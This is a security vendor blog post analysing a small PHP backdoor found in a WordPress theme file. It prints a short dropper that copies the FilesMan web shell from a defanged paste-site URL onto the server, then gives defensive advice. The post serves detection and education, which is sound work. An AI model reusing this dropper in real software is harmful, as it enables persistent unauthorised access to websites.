Backdoor Uses Paste Site to Host Payload

  • September 18, 2018
Backdoor using a paste site to host payload

Finding backdoors is one of the biggest challenges of a website security analyst, as backdoors are designed to be hidden in case the malware is found and removed.

Website Backdoors

A backdoor is a piece of malware that attackers leave behind to allow them access back into a website. Hackers like to inject code into different locations to increase their chances of retaining control of the website so they can reinfect it continuously.

Over the year, we have been talking a lot about new ways to decode complex malware that involve usual PHP functions like:

  • eval,
  • create_function,
  • preg_replace,
  • assert,
  • base64_decode.

According to our latest website hacked report, over the course of the previous year:

71% of all compromises had a PHP-based backdoor hidden within the site.

The effectiveness of these backdoors comes from their elusiveness to most website scanning technologies.

We have written many posts on backdoors and their effects. Today, we want to discuss some techniques that don’t follow any obfuscation tricks like encrypted strings, concatenations, and typecasting.

Unusual Backdoors

These unusual backdoors often look like legitimate code and can go unnoticed by most malware scanners available in the market.

However, during an incident response investigation, we detected an interesting backdoor that was small, simple and effective.

The backdoor content uploaded the wp-content/themes/buildup/db.php file and looked like this:

<?php
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
echo "Copy_success";
}else{
echo "Copy_failed";
}
?>

This small piece of code downloads the full malware from the hxxps://paste[.].ee website (if you are not familiar with this site, it’s like a Pastebin with SSL and fewer controls).

A free tool obfuscated the downloaded code, which is pretty common for malware developers to find. Additionally, we also see legitimate code using it too.

Obfuscated code that downloads malware from a website
Obfuscated code that downloads malware from a website

Note to devs: Avoid using free tools because they may be saving your code.

And here’s the more “readable” code:

Code that downloads malware from a website
Code that downloads malware from a website

And, as you may have noticed, this is a copy of the FilesMan backdoor which is often hidden in the filesystem making it hard to be found without access to the server or logs. A file is downloading the backdoor. An untrained eye may overlook this.

How to Avoid Website Backdoors

Backdoors can be very hard to find and even harder to get rid of. To begin, it is highly advisable that you monitor your logs constantly for unexpected behavior.

In order to prevent the website from getting infected in the first place, we highly recommend implementing security measures like file integrity monitoring and a Website Application Firewall (WAF).

If you suspect that your website is infected with a backdoor, we have an experienced website security team that can clean up your website. If you are a looking for a DIY solution, we have written a guide explaining How to Clean a Hacked Website.

Bruno Zanelato is Sucuri's Copywriter who joined the company in 2014. As Eng - System III and working for the SOC team since 2019, his main responsibilities are (firewalls, IDS, IPS, HIDS, WAF, log management, hardening systems, PCI Compliant, IDS/IPS Signatures, Linux/BSD hardening, including developing content to highlight Sucuri's products and services and to educate the public about website security. Bruno's professional experience covers more than 15 years of deploying/managing Web Application Firewall as well as open-source security software. When Bruno isn't drafting blog posts or writing web pages, you might find him online playing MMO RPG games, watching MMA, and having fun with his kids and family during his free time. Connect with him on Linkedin

Related Tags
Related Categories
You May Also Like